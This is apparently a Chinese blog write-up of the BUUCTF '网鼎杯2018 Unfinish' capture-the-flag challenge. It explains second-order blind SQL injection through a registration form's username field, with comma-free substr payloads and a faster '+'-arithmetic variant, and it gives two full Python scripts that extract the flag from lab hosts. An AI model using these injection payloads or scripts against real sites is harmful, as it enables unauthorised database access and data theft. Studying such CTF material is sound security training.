[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽

最新推荐文章于 2024-04-27 19:27:41 发布
最新推荐文章于 2024-04-27 19:27:41 发布
阅读量1k 收藏 10
点赞数 24
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/136985541
版权

网鼎杯太喜欢搞二次注入了吧。上次是无列名盲注,这次又是二次注入盲注。。。不知道方法还是挺难的。哎,网鼎嘛,能理解透彻就很强了。能自己做出来那可太nb了。

又是熟悉的登录框。不知道这是第几次看见网鼎杯的登录框了。后台扫描一下,会发现存在register.php。那还说什么,注册呗。

 

明显了,账号名会回显,且登录不需要用户名。这里就可能出现注入。既然要注入,就要闭合引号。

经过尝试,当构造如下payload。用户名就变成了1

0'||'1

 

 下边这个payload也会返回1。判断数据库的第一个字母是否为w。

0'||ascii(substr(database() from 1 for 1))='119'||'0

数据库名为web。这里from与for代替了逗号。很抽象的是它过滤了imformation并且还限制了账户名的长度。这要怎么爆破表啊 ,啊啊啊啊!

去看大佬的wp,都说是猜的表名flag。。。打ctf都靠猜是吧。

这里还有一个问题,就是脚本。因为它这个账号必须每次换一个脚本要特别注意账号是否重复

0'||ascii(substr((select * from flag) from 1 for 1))=102||'0

因为盲注需要有判断标志,所以使用beautifulsoup获取网页元素。当然也可以使用正则表达式。呜呜呜,我不会正则表达式的写法。脚本写的很烂,大家见谅。 

import requests
from bs4 import BeautifulSoup
import time

url_r='http://bc79444f-d493-45e1-b3d5-3efd45777843.node5.buuoj.cn:81/register.php'
url_l='http://bc79444f-d493-45e1-b3d5-3efd45777843.node5.buuoj.cn:81/login.php'
flag=''
for i in range(1,500,1):
    for y in range(32,128,1):
        data_r={'email': '{}@{}'.format(i+500,y),'username':"0'||ascii(substr((select * from flag) from {} for 1))={}||'0".format(i,y),'password': '1'}
        data_l={'email': '{}@{}'.format(i+500,y),'password': '1'}
        content_r=requests.post(url_r,data=data_r)
        time.sleep(0.5)
        content = requests.post(url_l,data=data_l)
        #print(content.text)
        soup = BeautifulSoup(content.content, 'lxml')
        name = soup.find('span', {'class': 'user-name'})
        if name.string.strip()=='1':
            flag=flag+chr(y)
            print(flag)
            if '}' in flag:
                break

这里我就跑一半吧,实在是太慢了。 

 

这个判断依据是登陆后账户名是1还是0。缺点就是速度很慢。下边还有一种速度很快的方法。可以学习一下。

利用+号。加号在mysql里当作运算符使用。

0'+1+'0=1

0'+ascii(substr((select * from flag) from 1 for 1))+'0=102

你看,的确返回了102 

 

这样构造脚本,运行速度就快很多很多。当然上边那个你也可以开多线程

import requests
from bs4 import BeautifulSoup
import time

url_r='http://7cacd614-4f7e-4099-bd5d-ef3f5ff0009a.node5.buuoj.cn:81/register.php'
url_l='http://7cacd614-4f7e-4099-bd5d-ef3f5ff0009a.node5.buuoj.cn:81/login.php'
flag=''
for i in range(1,500,1):
    data_r={'email': '5@{}'.format(i),'username':"0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i),'password': '1'}
    data_l={'email': '5@{}'.format(i),'password': '1'}
    content_r=requests.post(url_r,data=data_r)
    time.sleep(0.5)
    content = requests.post(url_l,data=data_l)
    soup = BeautifulSoup(content.content, 'lxml')
    name = soup.find('span', {'class': 'user-name'})
    flag=flag+chr(int(name.string.strip()))
    print(flag)
    if '}' in flag:
        break

 

这个就快多了,1分钟不到就拿到了。有些人一直问,不就是一个普通的盲注吗,有必要用+这类的奇淫妙计吗?要是你不会的话,确实可以使用最原始的方法,但性能上的期望就远远低了。所以新的方法还是要学的.

不会编程的崽
关注
  • 24
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Part_CAE_Unfinish.rar
06-15
适用初学者实例的分析案例,有助于童鞋们对有限元分析的了解。
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
网鼎杯-2018-unfinish解题方法
最新发布
Lemon_miko的博客
04-27 421
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1102
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 755
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
Aiwin的博客
05-18 1080
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
[网鼎杯2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 702
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
[CTF 真题] 2018-网鼎杯-Web-Unfinish
weixin_43586169的博客
07-22 1067
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
[网鼎杯2018]Unfinish
东隅的博客
10-11 742
另外,‘0’+123+'0’这样的注入进去是123,这样可以直接读到内容,这里的数字嘛,我们可以把想得到的东西进行两次hex()就好了,但是两次hex()之后注入数据库的数字变成了小数,这里可以用substr截取,而逗号被过滤了,如何不用逗号进行截取又是新的知识点,学到了:substr(str from 1 for 10) 这个样子。这个跟php的弱类型差不多的,‘’+(我们的盲注)+‘’,我们盲注的结果返回1那这里username就会变成1,反之为0。注册的时候用户名这样写:(注意单引号不能漏)
网鼎杯 2018 unfinish
feng的博客
10-29 2674
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
SQL注入:网鼎杯2018-unfinish
qq_68163788的博客
02-21 1230
SQL注入是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库中插入恶意的SQL代码,从而实现对数据库的非法访问或控制。攻击者可以通过SQL注入攻击获取敏感数据、修改数据、删除数据,甚至完全控制数据库
网鼎杯2018-二次注入unfinish绕过
lizhiiiii的博客
03-07 403
我们可以通过转两次十六进制来得到库名(如果只转一次十六进制如果转出的十六进制中有英文字母那么英文字母后面的数字就会被截断 我们得到的就不是完整的数字)
2018网鼎杯 三道web题 记录~~(二次注入)
a3320315的博客
02-07 7529
0x01 Comment 扫目录,源码泄露 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do']) { c...
XCTF:unfinish2018网鼎杯)(SQL二次注入)
羽的博客
09-14 1009
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值